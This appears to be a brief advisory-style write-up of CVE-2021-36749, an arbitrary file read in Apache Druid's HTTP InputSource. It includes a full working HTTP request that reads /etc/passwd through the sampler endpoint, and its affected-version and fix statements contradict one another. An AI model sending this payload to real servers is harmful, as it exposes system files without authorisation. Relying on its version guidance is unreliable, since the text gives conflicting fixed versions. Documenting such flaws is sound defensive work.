Apache Druid LoadData Arbitrary File Read Vulnerability CVE-2021-36749
0x01 Vulnerability Introduction
In the Druid system, InputSource is used to read data from a data source. However, HTTP InputSource allows authenticated users to read data from other sources, such as the local file system, with the privileges of the Druid server process.
This is not a privilege escalation when the user accesses Druid directly, because Druid also provides a Local InputSource, which allows the same level of access. But this is problematic when the user interacts with Druid indirectly through an application that allows the user to specify an HTTP InputSource instead of a Local InputSource.
In this case, the user can bypass the application-level restriction by passing the file URL to the HTTP InputSource. This issue was mentioned before and was fixed in 0.21.0 according to CVE-2021-26920, but not in 0.21.0 or 0.21.1.
0x02 range of influence
Scope : Apache Druid < 0.21.0
0x03 Vulnerability recurrence
URLS write payload
file:///etc/passwd
full packet
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 423
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
0x04 Repair
Upgrade to version 0.21.0 or later